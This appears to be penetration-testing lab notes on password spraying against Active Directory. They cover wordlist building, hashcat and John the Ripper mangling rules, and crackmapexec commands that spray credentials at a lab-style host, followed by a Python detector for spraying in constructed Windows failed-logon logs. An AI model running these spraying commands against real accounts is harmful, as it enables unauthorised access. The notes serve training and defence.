Take a wordlist
for example a statistically likely one
wget https://raw.githubusercontent.com/insidetrust/statistically-likely-usernames/master/weak-corporate-passwords/english-basic.txt
cat users.txt >> english-basic.txt
or build your own based on user enumeration (SMB, RPC, WEB)
Building Your Own Password Wordlist
usernames including admins
seasons
password
<empty>
Mangling with Rules
Enrich your wordlist with rules: append a bit here and there, reverse, mangle...
hashcat
hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.list
John The Ripper
john hashes --wordlist=mywordlist --rules=MyRuleSet
where the rule sets are defined in the rule file /etc/john/john.conf
[List.Rules:MyRuleSet]
Az"[0-9][0-9][0-9][0-9]"
[List.Rules:Toggle]
T0
T1
T2
T0T1
T1T2
T0T2
T0T1T2
[List.Rules:Double]
d
p5
[List.Rules:Reflect]
f
[List.Rules:Reverse]
r
Now that you have a wordlist that fits, prepare for the online password attack by checking the...
Account Policy
Determine the account policy of the Active Directory domain before you start, so that you do not lock out accounts
crackmapexec smb 10.129.228.111 --pass-pol
Start to crack with
crackmapexec smb
# usernames as passwords
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt --continue-on-success
# with custom pass list
crackmapexec smb 10.129.228.111 -u users.txt -p pass.lst
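The defender's view of the online attack above, as an added example that is not part of these notes: a small detector that picks the spraying pattern (many distinct accounts from one source, each tried fewer times than the lockout threshold from the account policy) out of Windows 4625 failed-logon records. The flattened log format, the 192.0.2.x source addresses and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security 4625 (failed logon) records flattened to:
# timestamp, source address, target account, NTSTATUS (0xC000006A = wrong
# password, 0xC0000234 = locked out). Addresses are documentation-range samples.
SAMPLE_EVENTS = """\
2024-05-01T09:00:01 4625 192.0.2.10 alice 0xC000006A
2024-05-01T09:00:02 4625 192.0.2.10 bob 0xC000006A
2024-05-01T09:00:03 4625 192.0.2.10 carol 0xC000006A
2024-05-01T09:00:04 4625 192.0.2.10 dave 0xC000006A
2024-05-01T09:00:05 4625 192.0.2.10 erin 0xC000006A
2024-05-01T09:01:10 4625 192.0.2.20 alice 0xC000006A
2024-05-01T09:01:11 4625 192.0.2.20 alice 0xC000006A
2024-05-01T09:01:12 4625 192.0.2.20 alice 0xC000006A
2024-05-01T09:01:13 4625 192.0.2.20 alice 0xC000006A
2024-05-01T09:01:14 4625 192.0.2.20 alice 0xC0000234
2024-05-01T09:30:00 4625 192.0.2.30 bob 0xC000006A
"""

EVENT_RE = re.compile(r"^(\S+) 4625 (\S+) (\S+) (0x[0-9A-Fa-f]+)$")

def parse_events(text):
    """Yield (timestamp, source, account, status) from the flattened log."""
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)

def detect_spray(text, window=timedelta(minutes=10), min_accounts=5, lockout_threshold=5):
    """Return {source: sorted accounts} for sources that, within `window`, failed
    against at least `min_accounts` distinct accounts while staying under the
    lockout threshold per account. One account hammered repeatedly (brute force,
    which trips the lockout) is deliberately not reported as a spray."""
    by_source = defaultdict(list)
    for ts, src, user, _status in parse_events(text):
        by_source[src].append((ts, user))
    findings = {}
    for src, events in by_source.items():
        events.sort()
        for i, (start, _) in enumerate(events):          # slide window over events
            per_user = defaultdict(int)
            for ts, user in events[i:]:
                if ts - start <= window:
                    per_user[user] += 1
            if len(per_user) >= min_accounts and max(per_user.values()) < lockout_threshold:
                findings[src] = sorted(per_user)
                break
    return findings
```

Running `detect_spray(SAMPLE_EVENTS)` flags only 192.0.2.10; the single-account lockout from 192.0.2.20 is a different alert class and should be handled by a separate lockout rule.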